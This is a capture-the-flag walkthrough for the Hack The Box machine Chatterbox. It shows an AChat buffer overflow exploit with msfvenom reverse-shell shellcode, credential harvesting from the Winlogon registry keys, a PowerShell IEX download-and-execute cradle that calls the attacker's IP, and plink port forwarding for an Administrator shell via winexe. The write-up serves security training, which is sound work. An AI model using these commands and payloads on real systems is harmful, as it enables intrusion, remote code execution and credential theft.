htb-chatterbox-nl

Chatterbox is a pretty simple box and reminds me a lot of something you run across in the OSCP labs. Overall it’s pretty easy, the only sort of tricky part is with privesc if you aren’t familiar with port forwarding. If you follow my Windows Privilege Escalation Guide on this one, you’ll be golden. Before you do the box, make sure you’ve reset it otherwise you won’t get a shell.
root@kali:~/htb# nmap -p- 10.10.10.74
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 08:24 EDT
Stats: 0:12:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.42% done; ETC: 09:02 (0:25:10 remaining)
Stats: 0:12:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.52% done; ETC: 09:02 (0:25:09 remaining)
Nmap scan report for 10.10.10.74
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1662.31 seconds
Looks like AChat is our target. A quick Google returns an exploit in python:
https://www.exploit-db.com/exploits/36025/The exploit payload is currently only going to run calc.exe, so we’ll need to generate a reverse shellcode payload. We can do this with msfvenom. Lucky for us the author of the exploit was nice enough to specify his exact command used in the comments, so we know the correct options along with which bad characters to exclude

root@kali:~/htb# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.5 lport=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' EXITFUNC=thread BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3706 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
--snip--
buf += "\x70\x47\x4a\x73\x51\x62\x42\x4f\x72\x4a\x39\x70\x42"
buf += "\x33\x69\x6f\x59\x45\x41\x41"
root@kali:~/htb#

We can go ahead and edit the exploit with our newly generated shellcode. Start up a netcat listener and run our exploit.

There seemed to be a file permissions misconfiguration on the local administrators folder, and the root.txt file. I assumed this was the method we were supposed to take to get the root.txt flag. root.txt is owned by Alfred so we can use icacls to give full permissions on the root.txt file so we can read it.

root@kali:~/htb# python achat.py 
---->{P00F}!
root@kali:~/htb# rlwrap nc -lvp 443 listening on [any] 443 ... 10.10.10.74: inverse host lookup failed: Unknown host connect to [10.10.14.2] from (UNKNOWN) [10.10.10.74] 49157 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami
whoami chatterbox\alfred
C:\Users\Administrator\Desktop>type root.txt 
type root.txt Access is denied.

C:\Users\Administrator\Desktop>dir /Q
dir /Q
Volume in drive C has no label.
Volume Serial Number is 9034-6528

Directory of C:\Users\Administrator\Desktop

12/10/2017 07:50 PM <DIR> BUILTIN\Administrators .
12/10/2017 07:50 PM <DIR> NT AUTHORITY\SYSTEM ..
12/10/2017 07:50 PM 32 CHATTERBOX\Alfred root.txt
1 File(s) 32 bytes
2 Dir(s) 17,932,922,880 bytes free



C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop 
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F 
BUILTIN\Administrators:(OI)(CI)(ID)F 
CHATTERBOX\Alfred:(OI)(CI)(ID)F
C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop>type root.txt
a67*****c7c

Privilege Escalation

After running through some basic privilege escalation enumeration (ahem) we find some credentials in the registry for autologon.

C:\Windows\Panther>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Welcome1!

Attempting to re-use this password with the Administrator account is successful, and can be
achieved using powershell or by opening SMB and using impacket’s psexec. Using powershell, the command

$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator' $passwd)

will store the credentials in $creds for the session. A reverse shell can now be opened with the supplied credentials using the command

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.2/puckieshell53.ps1')" -Credential $creds

It’s possible that password reuse may be at play here for the Administrator. To exploit this we’ll need to open up SMB on our target. We can do this by uploading plink.exe to our target and port forwarding over port 445.

First we start up our python http server.

root@kali:~/pwk# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.74 - - [20/Aug/2019 08:40:06] "GET /plink.exe HTTP/1.1" 200 -

Next we’ll download plink.exe using a powershell one liner.

C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.2/plink.exe', 'plink.exe')"

Start SSH service on our attacking box.

root@kali:~/htb/chatterbox# service ssh start

And run plink.exe from our target to forward the port over SSH.

C:\Users\Alfred>plink.exe -l puck -pw iestyle -R 445:127.0.0.1:445 10.10.14.5
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 fc:4d:bc:2f:51:41:40:0d:2e:e2:86:a6:06:fb:98:88
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y


The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 10 09:31:17 2017 from 10.10.10.43

root@kali:~# 

We can verify the port forward is working with netstat.

root@kali:~/htb/chatterbox# netstat -ano | grep 445
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:445                 :::*                    LISTEN      off (0.00/0/0)

Excellent. Now let’s use winexe to get a shell.

root@kali:~/htb/chatterbox# winexe -U Administrator //127.0.0.1 "cmd.exe"
Enter password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\administrator
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/puckieshell53.ps1', 'puckieshell53.ps1')"
C:\Users\Alfred>powershell -ExecutionPolicy ByPass -File puckieshell53.ps1

Author :Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *